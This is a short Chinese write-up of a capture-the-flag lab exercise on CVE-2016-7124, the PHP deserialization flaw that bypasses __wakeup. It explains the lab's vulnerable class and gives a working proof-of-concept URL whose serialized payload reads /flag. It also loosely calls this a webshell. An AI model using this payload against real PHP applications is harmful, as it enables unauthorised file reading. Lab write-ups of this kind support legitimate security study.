春秋云境CVE-2016-7124

1.阅读靶场信息

这里我们可以得到的信息就是序列化

沿着这个方向我们开启靶场吧

2.开启靶场

靶场如上图所示

代码功能分析

  1. 第一行highlight_file("/var/www/html/index.php") - 显示当前文件的源代码

  2. xiaorang类

    • 有一个公共属性 $file

    • __destruct():对象销毁时执行,读取并输出 $file 指定的文件

    • __wakeup():反序列化时自动执行,将 $file 强制设为 /var/www/html/index.php

  3. 最后部分

    • 检查GET参数 file 是否存在

    • 如果存在,直接对 file 参数值进行反序列化

3.poc利用

这里博主用的url就是

https://eci-2ze12sufspgrpapt2i5d.cloudeci1.ichunqiu.com:80/?file=O:8:%22xiaorang%22:2:{s:4:%22file%22;s:5:%22/flag%22;}

各位彦祖们可以参考参考

到这里相信各位彦祖们已经成功webshell了

希望大家喜欢,感谢你的观看

相关推荐
汤愈韬2 小时前
Stub区域应用、Totally Stub区域应用、NSSA区域应用和NSSA LSA详解
网络·网络协议·网络安全·security
m0_738120722 小时前
网络安全编程——PHP基础Session详细讲解
android·网络·windows·安全·web安全·php
上海云盾安全满满3 小时前
云原生环境该怎样解决网络安全问题
安全·web安全·云原生
zmj3203243 小时前
CSMS VS ISMS管理体系
安全·网络安全·信息安全
德迅云安全-小潘3 小时前
智能风暴:2026年网络安全进入“AI对攻”时代
人工智能·安全·web安全
李白你好3 小时前
SwordfishSuite | Web 安全测试平台智能代理、流量拦截、负载扫描和强大的插件系统
web安全
中云DDoS CC防护蔡蔡3 小时前
网站正常用户被高防误封怎么办
运维·服务器·http·网络安全·ddos
汤愈韬3 小时前
各类LSA的解析(一二三类LSA)
网络·网络协议·网络安全·security
战神/calmness3 小时前
CVE-2021-26295:Apache OFBiz 反序列化漏洞
网络安全·漏洞